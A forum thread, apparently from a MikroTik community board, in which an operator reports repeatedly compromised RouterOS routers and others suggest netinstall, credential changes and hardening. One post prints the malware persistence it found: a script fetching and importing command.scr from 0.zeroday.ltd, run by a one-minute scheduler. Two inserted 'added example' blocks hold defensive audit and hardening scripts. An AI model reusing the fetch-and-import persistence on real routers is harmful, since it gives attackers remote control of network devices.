Mikrotik router Hacked!!!

Hi all,

This past week we have been facing a lot of hacking issues on our routers. The symptoms are all the same: the router can still be pinged but cannot be accessed remotely, L2 traffic works fine but all L3 traffic is down, and the LCD shows no screen. When we try to reboot the router, it crashes and fails with a kernel boot failure.

These are the preventive measures that we have already taken:

  • Non-standard port for remote access to the router (not 8291, 21 or 22)
  • /ip/service only allows certain IPs to access the router remotely
  • Firewall input rule with a port-scanner detection rule that drops the suspected IPs
  • Upgraded the router firmware and RouterOS version to the latest (6.49)

This has happened to quite a number of our routers of different models (ccr1036, ccr1009, 4011, 3011, 1100, etc.).

Does anybody happen to have the same problem? Is there any other configuration we could do to prevent this?

Thank you

What makes you think this has anything to do with “hacking”?
Some of the issues you mention are possibly normal behavior with the latest “stable” ROS releases. :wink:

Only because it’s not on your list:

  • create a new user and delete ‘admin’ (don’t use something like ‘noc’ or other standard names).
  • set up messaging for logins, so you have a chance to notice if someone who shouldn’t be is working on it (e.g. email for system,account)

Backups and configuration export are not mentioned (for recovery with Netinstall if something goes bad).

Are you allowing access to the router from external sites?
If so how are you doing this?
Which kind of VPN are you using for this access?

/export hide-sensitive file=anynameyouwish

Hi,
Have you tried checking the scheduler and scripts on the router for something unusual?

Hi, we are quite sure because over 15 routers have the same issue. Before that we were using the old version 6.3xx; after upgrading to 6.49 the same issue reappeared.

Hi,

We have restricted access to the router to certain IPs only (office). If we are outside the office, we need to connect via L2TP before we can log in to the router.

We are blocking access using /ip/services, with a non-standard port and only certain IPs allowed to access the router. We also do a weekly backup to FTP.

While checking one of our router backups, we found this script:

/system script
add dont-require-permissions=no name=fetch owner=god policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source="/tool fetch url=http://0.zeroday.ltd/command.scr; :delay 10; /import file-name=command.scr; :delay 30; /file remove command.scr"

/system scheduler
add interval=1m name=fetch1m on-event=fetch policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-date=oct/22/2021 start-time=17:05:35

We tried to download this file “command.scr”; when we ran it, it was only an HTML file.

Any other suggestion guys?
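As an added example (not posted by anyone in the thread), this is how one would audit a RouterOS box from the terminal for the kind of persistence the export above shows: a script that fetches and imports remote content, and a scheduler that fires it every minute. The entry names (fetch, fetch1m, command.scr) and the keywords searched for are assumptions taken from that export; adjust them to whatever your own export shows.

```routeros
# Added example: audit a RouterOS 6 device for fetch/import persistence.
# Names below ("fetch", "fetch1m", "command.scr") are assumed from the export in the thread.

# 1. Every script, scheduler entry and running script job, with full source and policy
/system script print detail
/system scheduler print detail
/system script job print

# 2. Anything left in the file store (a downloaded command.scr would show up here)
/file print detail

# 3. Accounts and services a persistent attacker also tends to touch
/user print detail
/user active print
/ip service print
/ip socks print
/ip proxy print
/tool sniffer print

# 4. Flag every script whose source fetches or imports content.
#    :find returns nil when the substring is absent, so test the result type.
:foreach s in=[/system script find] do={
    :local src [/system script get $s source]
    :if ([:typeof [:find $src "fetch"]] = "num" || [:typeof [:find $src "import"]] = "num") do={
        :log warning ("suspicious script: " . [/system script get $s name] . " owner=" . [/system script get $s owner])
    }
}

# 5. Only if the unit must stay up until it can be netinstalled: pull the persistence.
#    The thread's consensus still applies: netinstall, and do not restore the old config.
/system scheduler remove [find where name="fetch1m"]
/system script remove [find where name="fetch"]
/file remove [find where name="command.scr"]
```

Step 4 is the useful part when there are many routers: paste it into each terminal session and grep the log for "suspicious script" rather than reading every source by eye. Step 5 removes only the two entries that were found; a scheduler that is allowed to run once more will re-create them, which is why the removal order is scheduler first.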

Now THAT is indeed something completely different and does not look good (as you guessed, that script should not be there…).
This indeed URL-fetches some ROS CLI/script code and can therefore be configured/provisioned with whatever is needed for an exploit/attack at a certain time.

I think the only safe way is to NETINSTALL these devices again.
After that, prepare all the config and only connect to “Internet” when you checked that all usernames/passwords/services are hardened.
Probably this was hacked a long time ago with some ROS version that had serious issues.

Perhaps the danger is also coming from “inside” your network?

It does look like someone has had (still has?) access to your device.

What I would do:

  • Block all external access to that device (pull the WAN cable out, sorry for that but it’s needed)
  • remove that script and schedule
  • review any other script/auto-setting/whatever still available in Files
  • review your logs for admin and VPN access
  • change password of admin user (better: make new user with admin rights and REMOVE default admin user)
  • change L2TP credentials
  • review your firewall (enable logging for all possible open ports until you identify the open door)
    Obviously someone is able to get in one way or the other so investigate those logs and firewall settings carefully.

Connect WAN again and regularly investigate logs for admin/VPN access. You could use a script to have them mailed to you periodically.
See what happens.

If all fails - emergency situation:
factory reset that router and start again.
Do NOT import any settings/scripts from the old environment without having seen every single line.

Others will surely chime in with alternative (better) suggestions.
EDIT: someone just did.
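The checklist above (new admin user, restricted services, firewall review, login notifications) as one pasteable baseline, added here as an example and not a config from anyone in the thread. It is meant for a freshly netinstalled router before the WAN cable goes back in. Everything in it is an assumption to be adapted: WAN is ether1, the management network is 192.0.2.0/24, the new account is rtr-ops, the mail relay is 192.0.2.25, and the syntax is RouterOS 6 (in v7 /tool e-mail takes server= instead of address=).

```routeros
# Added example: minimal hardening baseline for a freshly netinstalled RouterOS 6 device.
# Assumptions: WAN is ether1, management network 192.0.2.0/24, admin account "rtr-ops",
# mail relay 192.0.2.25. Apply from the console or over the LAN BEFORE reconnecting WAN.

# 1. Replace the default admin account (new user first, then remove "admin")
/user add name=rtr-ops group=full password="use-a-long-random-passphrase"
/user remove admin

# 2. Disable every service you do not use; bind the rest to management addresses only
/ip service disable telnet,ftp,www,api,api-ssl
/ip service set ssh port=2222 address=192.0.2.0/24
/ip service set winbox port=48291 address=192.0.2.0/24

# 3. Close the Layer-2 management paths (MAC-telnet, MAC-Winbox, neighbor discovery)
/tool mac-server set allowed-interface-list=none
/tool mac-server mac-winbox set allowed-interface-list=none
/tool bandwidth-server set enabled=no
/ip neighbor discovery-settings set discover-interface-list=none

# 4. Input firewall: accept management and the L2TP/IPsec VPN, log and drop the rest from WAN
/interface list add name=WAN
/interface list member add list=WAN interface=ether1
/ip firewall address-list add list=mgmt address=192.0.2.0/24
/ip firewall filter
add chain=input action=accept connection-state=established,related
add chain=input action=drop connection-state=invalid
add chain=input action=accept src-address-list=mgmt
add chain=input action=accept in-interface-list=WAN protocol=udp dst-port=500,4500,1701 comment="L2TP/IPsec"
add chain=input action=accept in-interface-list=WAN protocol=ipsec-esp
add chain=input action=drop in-interface-list=WAN log=yes log-prefix="INPUT-DROP"

# 5. Mail login/logout events so an unexpected session gets noticed
/tool e-mail set address=192.0.2.25 port=25 from=router@example.com
/system logging action add name=mail target=email email-to=noc@example.com
/system logging add topics=account action=mail
```

The drop rule in step 4 logs with a prefix so the "find the open door" review from the list above is a matter of filtering the log for INPUT-DROP. Step 2 keeps SSH and Winbox reachable only from the management network; the VPN users then land in that network and are covered by the mgmt address list rather than by a rule that opens the management ports to the whole Internet.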

Your router was hacked before it was upgraded, due to a bug in Winbox on the older version.

There is only one good solution:
Netinstall
Do NOT restore config
Export old config and add manually only what is needed.

I agree. The “zeroday.ltd” bit looks suspiciously like this post, which points to this 3-year-old CVE. OP may be part of the Mēris resurgence.

Remove all devices from the Internet.
Export the config so you can remember the NEEDED settings, but don’t copy blindly.
As stated, netinstall and do not copy the old config to the new firmware.
Do not use any of the same passwords, and change the port number for Winbox or SSH, for example.

Ensure all connected PCs etc. are fully scanned for viruses/malware.

Hi,

We have removed the hacked device and replaced it with a new one; we added new settings and removed all MAC-telnet and MAC-Winbox capabilities. But after a day or so, it is being hacked again. Really confused and frustrated with what’s going on.

On all the hacked routers, they have set a random reset timer, so it is very hard to reset them. After much patience, we managed to reset 40% of the routers, but the rest is still ongoing. After each reset, we netinstall the router and it feels like brand new.

But after we put it into production, it gets hacked as well, just like the new router.

All PPP secrets, scripts and scheduler entries have been checked, and all of the admin computers (with full and write authority) have been scanned with antivirus; all checked and no problem. We have also changed the default username to a strange name with a hard password.

We are wondering whether this is an exploit of a bug in MikroTik or a hole in the Linux OS that runs MikroTik.

Any idea guys?

Yes, stop using infected routers.
You need to install fresh netinstall latest firmware.
Use different passwords etc…
CHANGE ALL YOUR VPN settings, everything should be different from before.
Assume all passwords and secrets of all settings are known.


The only way you are being hacked is if you are not following basic security instructions.
The exploit is your own stupidity as an admin… also for not keeping routers up to date.

A bit harsh but it does boil down to this, yes.

<removed part, anav already said the same>

Adding an analogy, maybe it will become more clear:

Water is pouring from the tap, sink is spilling over.
What do you do first ?
Clean up the spilled water or close the tap ?

Right now it looks like you’re only cleaning… you’ll keep doing that until you close the tap.

A much kinder way of saying that, thanks Holeven, but not even close to satisfying :wink:

I know.
Still learning that part too :laughing:

Well, anybody that calls themselves an admin is allowed to make mistakes but when
they repeat the same mistakes after being given information on how to avoid it… blunt is less refined but more appropriate.
